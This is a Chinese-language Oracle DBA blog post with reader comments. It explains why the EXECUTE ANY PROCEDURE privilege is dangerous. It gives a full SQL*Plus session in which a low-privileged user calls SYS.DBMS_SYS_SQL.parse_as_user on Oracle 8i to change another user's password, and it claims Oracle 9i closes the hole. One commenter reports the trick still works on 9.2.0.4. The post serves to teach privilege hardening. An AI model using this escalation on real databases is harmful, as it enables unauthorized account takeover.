« What's mean ORA-25191? | Blog首页 | 楠溪江之美 »
Why "EXECUTE ANY PROCEDURE" is a dangerous PRIVILEGE?
作者:eygle |【转载时请务必以超链接形式标明文章原始出处和作者信息及本声明】链接:http://www.eygle.com/archives/2005/05/why_execute_any.html
TOM曾经多次说过:
All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and I can totally do anything I want to in your database.那么这个EXECUTE ANY PROCEDURE的危险来自哪里呢?
让我们通过一个例子来认识这个危险.
1.创建测试用户
$ sqlplus "/ as sysdba" SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005 (c) Copyright 2000 Oracle Corporation. All rights reserved. Connected to: Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production With the Partitioning option JServer Release 8.1.7.4.0 - 64bit Production SQL> create user hacker identified by hacker default tablespace users temporary 2 tablespace temp; User created. SQL> grant create session to hacker; Grant succeeded. SQL> grant execute any procedure to hacker; Grant succeeded. SQL> create user loser identified by loser default tablespace users temporary 2 tablespace temp; User created. SQL> grant connect to loser; Grant succeeded. |
2.使用测试用户连接
注意,此时用户hacker具有了访问和执行dbms_sys_sql包的权限。
SQL> connect hacker/hacker Connected. SQL> desc sys.dbms_sys_sql PROCEDURE BIND_ARRAY Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN N_TAB TABLE OF NUMBER IN PROCEDURE BIND_ARRAY Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN C_TAB TABLE OF VARCHAR2(2000) IN .... PROCEDURE VARIABLE_VALUE_ROWID Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN VALUE ROWID OUT |
3.这意味着什么?
SQL> connect hacker/hacker Connected. SQL> DECLARE 2 UID NUMBER; 3 sqltext VARCHAR2 (100) := 'alter user loser identified by test'; 4 c INTEGER; 5 BEGIN 6 c := SYS.DBMS_SYS_SQL.open_cursor (); 7 SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0); 8 SYS.DBMS_SYS_SQL.close_cursor (c); 9 END; 10 / PL/SQL procedure successfully completed. |
通过DBMS_SYS_SQL.parse_as_user,hacker可以在数据库内任意为非作歹了。
用户loser的口令已被更改:
SQL> connect loser/loser ERROR: ORA-01017: invalid username/password; logon denied Warning: You are no longer connected to ORACLE. SQL> connect loser/test Connected. SQL> |
4.注意版本
实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL.
SQL> grant execute any procedure to test; Grant succeeded. Elapsed: 00:00:00.33 SQL> connect test/test Connected. SQL> desc dbms_sys_sql ERROR: ORA-04043: object dbms_sys_sql does not exist SQL> desc sys.dbms_sys_sql ERROR: ORA-04043: object sys.dbms_sys_sql does not exist SQL> select * from v$version; BANNER ---------------------------------------------------------------- Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production PL/SQL Release 9.2.0.4.0 - Production CORE 9.2.0.3.0 Production TNS for Linux: Version 9.2.0.4.0 - Production NLSRTL Version 9.2.0.4.0 - Production Elapsed: 00:00:00.32 |
Oracle的世界也正在变得更加安全。
-----
这篇 【Why "EXECUTE ANY PROCEDURE" is a dangerous PRIVILEGE?】来自 www.eygle.com | CSDN技术网摘| del.icio.us|365Key
By eygle on 2005-05-10 10:19 | Comments (3) | Posted to SQL.PLSQL | Edit |Pageviews:
网上相关主题:
留言 (3)
不错。ANY系统权限一定要慎重。如果拥有了EXECUTE ANY PROCEDURE和CREATE ANY PROCEDURE也就意味着拥有所有的权限。
Posted by: yangtingkun at May 13, 2005 3:02 PM
实际上有了EXECUTE ANY PROCEDURE权限就够了,CREATE ANY PROCEDURE的权限可以自行获得。
当然是指Oracle8i中。
Posted by: eygle at May 13, 2005 11:00 PM
实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL?
大师,没想到我现在研究的问题,您在一年前就已作过了,哈,真强,可我这有点不太明白,我现在在这里试验环境是 Oracle 9.2.0.4 |+linux 可是,按照您的做法,可以处跟你同样的结果,那为何还要说,--不足以访问???再就是,还有别的关于any 权限的实验吗,哈,有点贪了,主要比较感兴趣,哈,谢谢。期待您的E-mail.
Posted by: tetian at September 20, 2006 5:43 PM
